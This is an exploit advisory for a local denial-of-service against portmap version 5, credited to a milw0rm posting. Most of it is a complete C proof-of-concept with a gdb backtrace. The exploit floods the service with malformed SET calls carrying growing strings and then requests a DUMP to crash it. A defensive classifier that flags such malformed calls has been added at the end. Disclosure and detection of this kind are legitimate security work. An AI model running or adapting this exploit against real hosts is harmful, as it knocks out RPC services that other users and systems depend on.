Portmap Local DoS (Set + Dump)
Author: Anonymous    Source: Unknown    Updated: 2007-10-10
Summary
Portmap is a server that converts RPC program numbers into DARPA protocol port numbers. It must be running in order to make RPC calls.

Portmap is vulnerable to a denial-of-service attack launched from localhost.
 
Credit:
The original article can be found at:
http://www.milw0rm.com/exploits/1815
 
Details
Vulnerable Systems:
 * Portmap version 5.

Exploit:
/////////////////////////////////////
// portmap Set+Dump Local DoS - PoC
////////////////////////////////////
//
// Federico L. Bossi Bonin
// fbossi[at]netcomm[dot]com[dot]ar
////////////////////////////////////

// Tested on Linux with version 5

// USE DEBUGGING MODE
/////////////////////

// (gdb) backtrace
// #0 0xffffe410 in __kernel_vsyscall ()
// #1 0xb7f21343 in write () from /lib/tls/libc.so.6
// #2 0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6
// #3 0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6
// #4 0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6
// #5 0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6
// #6 0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6
// #7 0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6
// #8 0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6
// #9 0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6
// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6
// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6
// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6
// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6
// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515
// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6
// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6
// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6
// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303

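#include <stdio.h>
#include <stdlib.h>   // exit, atoi, malloc, free
#include <string.h>   // memset, memcpy, strlen
#include <strings.h>  // bcopy
#include <unistd.h>   // gethostname, close
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <rpc/pmap_prot.h>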

int i;
int len=600;
char myhost[256];

int main(int argc, char *argv[]) {

  if (argc < 2) {
 printf("usage:%s <hostname>\n",argv[0]);
 exit(1);
  }

  if (argc >2) { len=atoi(argv[2]); }
  if (len > 1024) { len=1024; }

  unsigned long PROGRAM=100000;
  unsigned long VERSION=2;

  struct hostent *hp;
  struct sockaddr_in server_addr;
  int sock = RPC_ANYSOCK;
  register CLIENT *client;
  enum clnt_stat clnt_stat;
  struct timeval timeout;
  timeout.tv_sec = 40;
  timeout.tv_usec = 0;


  if ((hp = gethostbyname(argv[1])) == NULL) {
  printf("Can't resolve %s\n",argv[1]);
  exit(0);
  }

  gethostname(myhost,255);
  bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length);
  server_addr.sin_family = AF_INET;
  server_addr.sin_port = 0;

  if ((client = clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) {
  clnt_pcreateerror("clnttcp_create");
  exit(0);
  }

  client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL);

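  // Zero the buffers by size: strlen() on fresh malloc() memory is undefined.
  // data gets one extra byte so a 1024-character string keeps its terminating NUL.
  char *data = (char *) malloc(1025);
  memset(data,0x0,1025);

  char *response = (char *) malloc(1024);
  memset(response,0x0,1024);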

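  // Procedure 1 is PMAPPROC_SET. Each iteration appends one '1' to the string
  // and sends it as the call argument.
  for (i = 0 ; i < len ; i++) {
  memcpy(data+strlen(data),"1",1);
  clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout);
  }

  // Procedure 4 is PMAPPROC_DUMP, which asks portmap to return its mapping list.
  clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout);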

  clnt_destroy(client);
  close(sock);
  free(data);
  free(response);
  exit(0);
}
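
A detection-side companion to the PoC above, added here and not part of the original advisory or exploit: the PoC sends an XDR string to procedure 1 (SET), where portmapper version 2 (RFC 1833) expects a 16-byte struct pmap, so a monitor can flag SET calls whose argument length is wrong. The function names, the verdict enum and the sample bytes (which use AUTH_NONE rather than the PoC's AUTH_UNIX credential) are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Values from ONC RPC (RFC 5531) and portmapper v2 (RFC 1833). */
#define PMAPPROG     100000u
#define PMAPPROC_SET 1u
#define PMAP_ARG_LEN 16u  /* struct pmap on the wire: prog, vers, prot, port */
enum verdict { TRUNCATED = -1, NOT_PMAP_V2_CALL, PMAP_OK, PMAP_SET_MALFORMED };

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
/* Skip one opaque_auth (flavor, length, padded body); returns next offset, 0 on error. */
static size_t skip_auth(const uint8_t *m, size_t len, size_t off) {
    if (off == 0 || off + 8 > len) return 0;
    uint32_t n = be32(m + off + 4);
    if (n > 400) return 0;  /* RFC 5531 limits the body to 400 bytes */
    size_t next = off + 8 + ((n + 3u) & ~(size_t)3);
    return next <= len ? next : 0;
}

/* Classify one RPC message (TCP record mark already stripped, single fragment). */
enum verdict classify_pmap_call(const uint8_t *m, size_t len) {
    if (len < 24) return TRUNCATED;
    /* Offsets: xid 0, msg_type 4 (0 = CALL), rpcvers 8, prog 12, vers 16, proc 20. */
    if (be32(m + 4) != 0 || be32(m + 8) != 2 || be32(m + 12) != PMAPPROG || be32(m + 16) != 2)
        return NOT_PMAP_V2_CALL;
    size_t args = skip_auth(m, len, skip_auth(m, len, 24));  /* credential, then verifier */
    if (args == 0) return TRUNCATED;
    if (be32(m + 20) == PMAPPROC_SET && len - args != PMAP_ARG_LEN) return PMAP_SET_MALFORMED;
    return PMAP_OK;
}

/* Constructed samples with AUTH_NONE credential and verifier; not captured traffic. */
#define HDR(proc) 0,0,0,1, 0,0,0,0, 0,0,0,2, 0,1,0x86,0xA0, 0,0,0,2, 0,0,0,proc, \
                  0,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0
/* SET carrying a struct pmap: prog 100003, vers 3, prot 6 (TCP), port 2049. */
static const uint8_t SET_PMAP[] = { HDR(1), 0,1,0x86,0xA3, 0,0,0,3, 0,0,0,6, 0,0,8,1 };
/* SET carrying the XDR string "1" (length word, one byte, three pad bytes). */
static const uint8_t SET_STRING[] = { HDR(1), 0,0,0,1, '1',0,0,0 };
static const uint8_t DUMP[] = { HDR(4) };  /* DUMP takes no arguments */

int main(void) {
    printf("%d %d %d\n", classify_pmap_call(SET_PMAP, sizeof SET_PMAP),
           classify_pmap_call(SET_STRING, sizeof SET_STRING),
           classify_pmap_call(DUMP, sizeof DUMP));
    return 0;
}
```

The length test is a heuristic: an XDR string of 9 to 12 bytes also encodes to 16 bytes, so pair it with a count of SET calls per connection.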
 